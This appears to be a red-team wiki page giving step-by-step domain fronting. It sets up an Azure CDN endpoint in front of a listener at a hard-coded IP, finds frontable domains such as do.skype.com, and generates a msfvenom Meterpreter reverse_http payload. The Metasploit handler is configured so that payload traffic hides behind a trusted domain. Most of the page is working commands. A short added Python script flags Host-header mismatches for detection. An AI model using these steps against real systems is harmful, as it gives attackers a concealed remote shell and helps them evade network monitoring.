# Domain Fronting

1. Set up a custom CDN endpoint whose custom origin hostname points to the listener host running the web server.

<figure><img src="/files/MIWJC4ScVg3a89M6bwOc" alt=""><figcaption></figcaption></figure>

{% code title="custom origin hostname server" %}

```
sudo python3 -m http.server 80
```

{% endcode %}

{% code title="server to handle https" %}

```
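from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl

# Serve the current directory over HTTPS on the listener host
httpd = HTTPServer(('138.68.99.177', 443), SimpleHTTPRequestHandler)

# ssl.wrap_socket() was removed in Python 3.12; use an SSLContext instead
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile='cert.pem', keyfile='key.pem')
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)

httpd.serve_forever()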
```

{% endcode %}

```
sudo python3 httpsserver.py
```

{% code title="verify connectivity" %}

```
curl http://offensive-security.azureedge.net
curl -k https://offensive-security.azureedge.net
```

{% endcode %}

{% hint style="info" %}
The CDN fetches its content from the web server at the custom origin hostname.
{% endhint %}

<figure><img src="/files/UKZlbyIUqrZyazc3XTfY" alt=""><figcaption></figcaption></figure>

{% code title="2. find frontable domains" overflow="wrap" %}

```
git clone https://github.com/rvrsh3ll/FindFrontableDomains
cd FindFrontableDomains/
sudo ./setup.sh
python3 FindFrontableDomains.py --domain skype.com
```

{% endcode %}

3. Check that the frontable domain returns the custom server's content, i.e. the content served by the host behind the custom origin hostname set up in step 1 (same result as at the end of step 1).

<pre><code>curl --header "Host: <a data-footnote-ref href="#user-content-fn-1">offensive-security.azureedge.net</a>" <a data-footnote-ref href="#user-content-fn-2">http://do.skype.com</a>
</code></pre>

<figure><img src="/files/wse5ukbgtNyFCQvHXbvf" alt=""><figcaption><p>no return = failed</p></figcaption></figure>

{% code title="4. create payload" overflow="wrap" %}

```bash
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=do.skype.com LPORT=80 HttpHostHeader=offensive-security.azureedge.net -f exe > http-df.exe
```

{% endcode %}

5. Configure the listener on the VM hosting the custom origin hostname web server from step 1.

<pre class="language-bash"><code class="lang-bash">set LHOST do.skype.com
set <a data-footnote-ref href="#user-content-fn-3">OverrideLHOST </a>do.skype.com
set OverrideRequestHost true
set HttpHostHeader offensive-security.azureedge.net
run -j
</code></pre>

<figure><img src="/files/gfW4CShlI70XwKHJlBbE" alt=""><figcaption><p>when it is actually connecting to the custom origin hostname server directed by the CDN</p></figcaption></figure>
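The requests in steps 3 to 5 connect to one hostname (`do.skype.com`) while carrying a different `Host` header (`offensive-security.azureedge.net`), and a proxy that logs both values can flag that mismatch. The Python below is an added example, not part of the original notes; the record fields `conn_host` and `host_header`, the `allowed_pairs` parameter and the sample records are assumptions constructed for illustration.

```python
# Added example: flag requests whose Host header differs from the hostname
# the client actually connected to (URL host for HTTP, SNI for inspected TLS).
# The record layout and field names are assumptions, not a real proxy format.

def normalize_host(value):
    """Lowercase a host, drop any :port suffix and a trailing dot."""
    host = value.strip().lower()
    if host.startswith("["):                 # IPv6 literal such as [::1]:8080
        return host[1:host.find("]")] if "]" in host else host
    if host.count(":") == 1:                 # hostname:port or IPv4:port
        host = host.rsplit(":", 1)[0]
    return host.rstrip(".")


def find_host_mismatches(records, allowed_pairs=frozenset()):
    """Return records where the connection host and Host header disagree.

    allowed_pairs holds (connection_host, host_header) tuples that are known
    to be legitimate, e.g. a CDN alias the organisation itself operates.
    """
    hits = []
    for rec in records:
        conn = normalize_host(rec["conn_host"])
        header = normalize_host(rec["host_header"])
        if conn and header and conn != header and (conn, header) not in allowed_pairs:
            hits.append({**rec, "conn_host": conn, "host_header": header})
    return hits


# Constructed sample records: the first uses the hostnames from this page,
# the others are example.com placeholders that differ only in case/port/dot.
SAMPLE_RECORDS = [
    {"src": "10.0.0.5", "conn_host": "do.skype.com",
     "host_header": "offensive-security.azureedge.net"},
    {"src": "10.0.0.6", "conn_host": "www.example.com",
     "host_header": "WWW.EXAMPLE.COM:80"},
    {"src": "10.0.0.7", "conn_host": "cdn.example.com.",
     "host_header": "cdn.example.com"},
]

if __name__ == "__main__":
    for hit in find_host_mismatches(SAMPLE_RECORDS):
        print(f'{hit["src"]}: connected to {hit["conn_host"]} '
              f'but sent Host: {hit["host_header"]}')
```

For HTTPS traffic the `Host` header is only visible where TLS is inspected; without inspection only the SNI value is available and this comparison cannot be made.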

[^1]: CDN setup in 1.

[^2]: resulted from 2.

[^3]: can change the listening port as well with the *OverrideLPORT* option


